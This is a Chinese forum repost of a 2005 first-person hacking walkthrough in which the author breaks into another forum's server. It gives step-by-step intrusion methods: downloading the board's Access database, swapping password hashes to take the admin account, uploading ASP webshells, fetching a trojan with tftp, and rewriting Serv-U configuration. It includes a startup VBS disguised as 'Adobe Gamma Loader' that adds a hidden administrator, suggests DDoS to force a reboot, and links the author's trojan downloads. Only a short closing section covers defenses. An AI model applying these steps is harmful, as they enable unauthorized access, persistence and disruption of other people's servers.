QQ登录

只需要一步,快速开始

 注册地址  找回密码
查看: 3289|回复: 1
打印 上一主题 下一主题

通过asp木马配合serv-u取得管理员权限

[复制链接]
字体大小: 正常 放大
韩冰        

823

主题

3

听众

4048

积分

我的地盘我做主

该用户从未签到

发帖功臣 元老勋章

跳转到指定楼层
1#
发表于 2005-1-23 13:28 |只看该作者 |倒序浏览
|招呼Ta 关注Ta

编者:文章题目很简单.内容却比题目有趣多了,建议各位看看

# |1 ]9 Y5 N! ~, R) z; a' r7 E: J

作者:ALLEN QQ:515659

& V- k3 L" G# U, Q& {

今天心情不好,写一篇文章玩玩吧,利用网站的配置错误配合serv-u取得管理员权限,简单一点就是通过asp木马配合serv-u取得管理员权限,哈哈哈,是不是很cool阿! 3 }, N5 _6 b' Z2 c ------------文章开始------------ / u5 i$ L. ]! y 为了找仓木麻衣的mp3(这个小姑娘的歌很好听阿),把半个互联网都搜完了(太夸张了把),就是找不到,苦然眼镜一亮,哈哈哈×××论坛,看来人气不错,也有mp3的下载地址,那就去看看吧 - z& G2 y0 A8 J5 s# r 晕~~~~, : U5 v4 {# {( v y$ V" C论坛错误信息 1 ]4 k/ c+ f) z- M" C z 产生错误的可能原因: . j% f$ {. u. d$ g F Y% ~: z 您是否仔细阅读了帮助文件,可能您还没有登陆或者不具有使用当前功能的权限。 - w: F' v2 R0 f1 c7 f; [* N8 g' C还要注册阿,可是论坛由于种种原因又不让注册 4 ]$ B9 ~+ O0 X气的我差点吐血! ) w3 L2 J2 M) A1 o+ O& ]怎么办阿???唉,本想用溯雪破解几个密码。可是我们这个落后的地方上网贵,速度慢,有那个钱早就可以去买几张d版cd了,算了吧,想想别的办法把,打开我的xscan,随便扫了一下,服务器挺安全阿,只开了21,80,3389端口 7 i, |' M x" u' F, S& ?看来做了端口过滤 . ?! B* R6 ]4 j没什么可利用的漏洞怎么办,不要着急,他用的是动网论坛,先试着下载他的数据库试试吧 ' G, |7 h/ L+ o* J/ U/ } 手动的找了一些,都不行 1 d% \/ A/ O0 ^" o7 Z8 |我先猜一下数据库在哪个目录里面,如果猜对的话下载数据库的成功率就比较高了 1 e8 H: Q- L" n0 Q( R/ W6 Q& `5 ^ _blank>http://aaa.com/data 4 p4 ?+ G2 d& q5 K+ u" E" e_blank>http://aaa.com/database & {, G! m7 R* [2 X: m_blank>http://aaa.com/db 5 }# U' ^$ K6 G! k( u8 W# B HTTP 错误 404 - 找不到文件 ' E. o" v# w. k$ J) O0 XInternet 信息服务 ! g( `( I/ w4 Y/ r" }# N继续 3 \; W+ T3 J, k _blank>http://aaa.com/mdb : v2 E/ h0 ~ JHTTP 错误 403 - 禁止访问 $ f" m. p, k1 ] Internet Explorer , q3 a$ e( l/ H出现403错误就说明对方有这个目录,但是不允许浏览目录 + t9 F6 K( q$ {" Y& ]; z 想想看mdb这个目录会是干什么的??哈哈十有八九十存放数据库的目录! " n2 n$ @; q& m$ y7 O, h把我以前些的添加的数据库地址文件载入xscan(专门下载数据库的地址),然后只扫描cgi漏洞 0 D. d1 h' Z/ ] scaning.......,大概10分钟过去了 ( G8 u( h# a* M" D 扫描结果 ! M% d$ \4 ?6 w( b/ v/mdb/lovemaik.asa [漏洞描述] V; |# ^8 I( |, L& B0 S 哈哈哈,成功的扫到了数据库,顺便告诉大家一个技巧( S: Y: C) x- y! z' ~2 B 把一些常用的数据库地址如data.mdb,database.asp等等添加到xscan的cgi数据库中,或者单独作一个数据库,你可以用一些字典来生成数据库地址,这样的成功率很高的! ' V6 j0 e2 S2 wxscan有一个好处就是可以直接扫域名,比如_blank>http://www.seeie.com / _1 ^! N: ^7 u7 U( U- g' u' ^4 ~$ N这样的话xscan就会帮你猜数据库地址 ! ^- V7 Y) a: M& \* o_blank>http://www.seeie.com/mdb/data.asp & }2 \& q% o+ o8 V0 A7 n. j2 ?7 v _blank>http://www.seeie.com/mdb/db.mdb ' f: i% o- w4 I: C b( O9 x. [9 N....... ' R# G+ }4 n4 W( Z- u2 F' b 好了,现在打开Net Transport(一种很爽的下载工具)把数据库down过来,用了50多分钟,终于下载完了 " o$ e* X! D: u g' O0 A在自己的机器上安装jmail和动网论坛,把下载的数据库覆盖新数据库并且把数据库扩展名改为.mdb,接着注册用户:allen,密码:123456 5 V. n i6 l4 r1 i 现在打开数据库,查看到我们刚才注册的用户allen的密码为49ba59abbe56e057(由于论坛使用md5不可逆算法加密,所以不能得到明文密码2 F# c- D$ @9 ]) d好的把这一串数据复制一下,然后找到管理员的名字,也就是查找userclass表中数据为管理员的名字,把他的密码改成49ba59abbe56e057,记住在改密码之前一定要把他的密码(经过MD5加密过的)复制到一个记事本里,好了,我们用管理员的名字登陆,密码就是123456,接着我们就去修改管理员的资料,把回答问题和答案改掉!把email换成自己的,接着把刚才注册的用户allen提升为管理员,退出,在用allen帐号登陆,把原来的管理员降成普通用户,可能有些人会问这样做是为什么,原因是动网论坛不允许通过email取回管理员的密码,接着在打开数据库把原来管理员的密码给恢复了,在打开论坛,忘记密码-回答问题-取回密码,哈哈哈,快打开你的信箱把,密码已经发到你信箱了(注意,你的系统最好装jmail等邮件发送组件,要不然就会发不了邮件的) 0 p4 G N! j+ \6 f& ^$ _4 J 现在我们拿到了论坛管理员的密码了, . z+ h, ]& }' E6 B# p 注意:以上步骤都是在本地操作的,其目的就是为了拿到论坛管理员密码. ?& e5 w- T+ i) i: f+ ?现在登陆那个论坛-进入管理页面-论坛版面管理 -随便选一个讨论区-在上传文件类型中加上.asp,呵呵 6 ]$ z9 I% Y, Q3 F, U" W: i, R 好了,进去这个讨论区发表帖子-上传文件,呵呵,把asp木马传上去 $ X8 S7 h2 ~0 |8 }; h6 E好了,可是这个文件被重命名了,唉,新亏手里还有一个免fso的木马,只有一个文件。传上去 7 J$ t/ g [$ s3 T( a 可惜这个木马不好用,还是自己的木马用着顺手,于是tftp -i ***.***.***.*** GET use.asp : T/ Z; o1 |& p, N好了,成功了,接这运行木马***.com/bbs/use.asp?id=1 $ x# ~" Y. f+ J' X# o# J0 r 呵呵,服务器的东西清清楚楚的摆在我们面前了,上传一个winshell把 & D5 Z: F! i2 A* r2 M 靠,服务器有病毒防火墙,看看是nav的,算了,自己加个壳吧,这样可以逃过防火墙1 `* k% Y/ x& J继续,传上去并执行。。。。没反应! , a4 f2 f. }" f4 I x0 \, R 先telnet ip 8210(我喜欢用noika手机的型号做为端口,)

zan
转播转播0 分享淘帖0 分享分享0 收藏收藏0 支持支持0 反对反对0 微信微信
韩冰        

823

主题

3

听众

4048

积分

我的地盘我做主

该用户从未签到

发帖功臣 元老勋章

靠,不行,差点忘了,对方做端口过滤了,怎么办阿,试试idq.dll(没报什么希望),果然对方的目录不可执行,在看一下对方有没有装perl,还是没有!在看看对方是什么分区格式,要是fat32那就好办了,试着删除c:\的任何文件都提示没有权限!说明对方是ntfs分区,唉,麻烦阿!!! ) |- A3 L, l/ {6 H本来想就此打住的时候突然发现了d:\Serv-U,于是我就想通过他来拿到权限 ; y8 r2 o5 X+ b# ~6 Y, t 注:在此之前最好在自己的机器上装一个Serv-U, # K$ V- k6 h/ Z! j% F/ S# L7 r 我们先看看ServUStartUpLog.txt 这里面有Serv-U的版本信息! 8 r+ \/ r. Y% o' W+ d' R' Z" {Sat 01Mar01 12:15:24 - Serv-U FTP Server v4.0 (4.1.0.0) - Copyright © 1995-2002 Cat ! r1 M& z% C) Q+ H( O# g1 M 。。。。。。。。。。 . q+ V6 C0 F2 j5 L- z9 l版本挺新阿,呵呵 4 F* S0 @6 O: o- n6 W, X1 D 接着看看ServUDaemon.ini(用户配置文件) + |' v5 O |& G4 |& b" j' i4 \5 Y$ A哇考,里面的用户真多阿! % K9 J P" P4 k5 O: T! |. Y8 ~接着我们把这个文件的内容复制一下,然后粘贴到本地serv-u的ServUDaemon.ini文件中,记住这时候最好停掉你的serv-u,保存文件,接着打开ServUAdmin.exe,重新添加一个用户,记住这个用户最好是管理员权限,必须对目录和文件可以进行读写可执行等一切操作,接着把用户主目录设为c:\ 5 {& g9 d. W5 y4 v' G* x# R+ M哈哈哈,到次为止大家都知道我的用意了把! 9 k$ N3 b' r) i" P 把本地的ServUDaemon.ini的内容copy到对方服务器的ServUDaemon.ini中,然后保存! , w, M: [, v% m3 Q接这ftp上去 % q$ o2 _7 R. j, Z 哈哈c盘的东西全部暴露了,现在我们对c盘有读写权限,可以进行任何操作(注意:serv-u的管理员权限和nt的管理员权限不是一样的,serv-u的管理员只能配置serv-u) + t! I) R9 }/ [3 I* N 由于对方做了端口过滤,办法不是很多,可以参考一篇修改注册表根改端口过滤的文章,是灰色轨迹论坛的一个网友写的,哈哈,在这里就不多说了! # @& \, o4 {* a" g" U/ v我们先写一个vbs脚本,把这个脚本重命名为Adobe Gamma Loader.vbs,这样管理员不容易发现! , L; O6 _& h1 T 脚本内容: 0 o7 \! a/ F! [( o% _# Y. K6 a set wshshell=createobject ("wscript.shell" ) v" Q4 a% J+ R/ A4 g8 Q. {# P0 Sa=wshshell.run ("cmd.exe /c net user allen ***** /add",0) $ b% K6 U8 |' w% t- |6 yb=wshshell.run ("cmd.exe /c net localgroup Administrators allen /add",0) ) Y- V2 B/ F8 h! X' M/ W大家都能看懂把,就是添加一个用户为allen密码为***的具有管理员权限的帐号,哈哈! ! ~9 L$ ~. Y* i( y& q 把这个脚本上传传到c:\Documents and Settings\All Users\「开始」菜单\程序\启动\ 3 c) d6 w6 ]* [& w, J, _ U呵呵为什么要vbs脚本呢?原因很简单,就是不让管理员看见那个跳出来的黑黑的dos窗口。 4 ?, M* m& ~; F现在我们想办法让对方机器重启动! # P& `. k, {4 K, d0 {8 c: H 用asp木马上传一个shutdown.exe - N0 R/ d) \( Y1 k2 z然后执行shutdown.exe 127.0.0.1 /r * _% w( B5 `' l2 I& J哈哈,有时候可能不会成功,是权限的原因,具体。。。我也不太清楚。 - }; ]9 {: ?6 M6 P+ j 不过在nt or 2000上普通用户都可以重起机器 + j7 p z; s9 T 还有一个办法就是在你的机器上新建一个计划任务,内容就是定时重启动计算机,然后把他放到对方计划任务的目录下,如果对方没有开计划任务就不行了! 8 { {* |3 Q; W3 D1 c* _6 K 如果还是成功不了你就用ddos把,哈哈,很暴力的让对方拒绝服务,接这就会重启(有可能是管理员操作的) ) f x' c( m% F8 O* h! |1 u) o) \$ Q& b3 u( z/ E# L' d( P5 k7 W 重启之后只要管理员登陆就可以添加一个帐号,哈哈 0 y8 e# @7 F5 T$ \- e, H. x到此为止我已经拥有了管理员权限,呵呵 ; Q# v+ t) y% w6 Z ) _6 h9 o- l; E4 C( z0 c" L: U(关于端口过滤) 2 p! r: Z" X* z# e7 Q一般服务器至少会开21,80端口,像这种情况,即使有了管理员权限也没有多大用处! 0 Y& [. }: ] E0 c$ h' E1 m' m如果你可以得到一些bbs或者其他程序的管理员密码就比较好办了 # m8 v, C) v. y* f 先传asp木马,然后用sc停掉ftp服务,接着弄一些后门来占用21端口 # N7 f! V( Y- z* O5 E4 @3 n 或者干脆暴力的占用!不过这些办法在ntfs的分区上成功率并不高!经过实践我发现一般可以暴力占用80端口,前提是对方web服务器为iis!这样在你没有完全拿到管理员权限之前,对方的网站可能会一直瘫痪,哈哈! 6 J1 t: b8 M; u" O , F1 _ m1 \5 U9 S. b' w% I- L(关于access数据库的安全性) 0 k6 b2 p4 A! o* [4 l# C" p 现在大部分网站都使用asp+access构建,这样的话通过下载access数据库简单就可以对网站进行破坏! ) R0 L' w( F7 A. a. Y( h" d- j% y3 G" G6 d# n 而很多的网站都不太重视这些,比如数据库文件名是data.mdb等 : C/ E. k/ w/ _. u1 s而又有一部分人认为把数据库的扩展名改成.asp就万事大吉了, - I8 I- L8 R, ? A8 G L% q- @4 m 其实不然!大家可以做个试验 ,在自己的机器上把mdb改成asa或者asp 然后用任何一种下载工具下载,下载之后再把文件名改成.mdb " ]5 Q* o6 U! m2 g! ]文件照样可以用!道理很简单!iis只执行<% %>内的内容,而mdb文件单纯的修改扩展名只会让iis错误的以txt方式显示出来 # D* E0 d1 ?- _4 v3 l( T v: u 你可以看见,如果在浏览器执行***.asp(注意:这个是mdb数据库)就会看见一大堆乱码,和你用记事本打开看见的一样! 3 D1 d/ @# ]* j1 u& e& r& W防止数据库被下载的方法就有4种 S4 F" C6 K1 E) U. M; g0 y T 1:在数据库新建一个表,表名为<%safe就可以了 ,这样iis在解析的时候会出现500错误,数据库也就下载不了了! % n* w* P G: k$ N% q+ Z 2:在你的数据库文件名后门加上# (不是扩展名,比如name#.mdb)这样iis就以为你是在请求该目录中默认的文件名,比如index.asp,如果iis找不到就会发出403禁止浏览目录的错误警告! 6 i0 Q4 e8 A( L4 X7 w, _! g3:在iis中是把数据库所在的目录设为不可读,这样就可以防止被下载!请放心,这样做不会影响asp程序的正常使用!! ) [% p0 u [- h1 s5 g 4:直接使用数据源 (ODBC)这样数据库就可以不用在web目录里面,从而彻底防止被下载,但是这样做你必须拥有服务器的管理员权限,哈哈,大部分虚拟主机用户是不可能用数据源 (ODBC)的! 4 [, S% `! H/ v. }; }& u8 c -------------------------------------------------------------------------------- 5 H" u6 b: N# y) e2 U本文涉及到的asp木马可以在以下地址下载: 9 m2 |) j+ U2 E/ B _blank>http://www.seeie.com/download/door/aspmm.rar (本人写的,需要在木马后面加上?id=1的参数,比如_blank>http://aaa/com/use.asp?id=1) 6 U; y/ l4 N- S1 G6 [# _ _blank>http://www.seeie.com/download/door/nofso.rar (免fso的asp木马,很不错) % H, m: `5 E5 i( h% b7 I/ h % c7 u* }$ ?6 A! L2 l Homepage:seeie.com . i, \9 G4 D# h! O4 r0 Y Email:raul666@163.com 8 X3 k2 g3 ^- t$ a2 c: ^-----------------文章结束------------------------------
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 注册地址

qq
收缩
  • 电话咨询

  • 04714969085
fastpost

关于我们| 联系我们| 诚征英才| 对外合作| 产品服务| QQ

手机版|Archiver| |繁體中文 手机客户端  

蒙公网安备 15010502000194号

Powered by Discuz! X2.5   © 2001-2013 数学建模网-数学中国 ( 蒙ICP备14002410号-3 蒙BBS备-0002号 )     论坛法律顾问:王兆丰

GMT+8, 2026-4-19 09:39 , Processed in 0.452510 second(s), 57 queries .

回顶部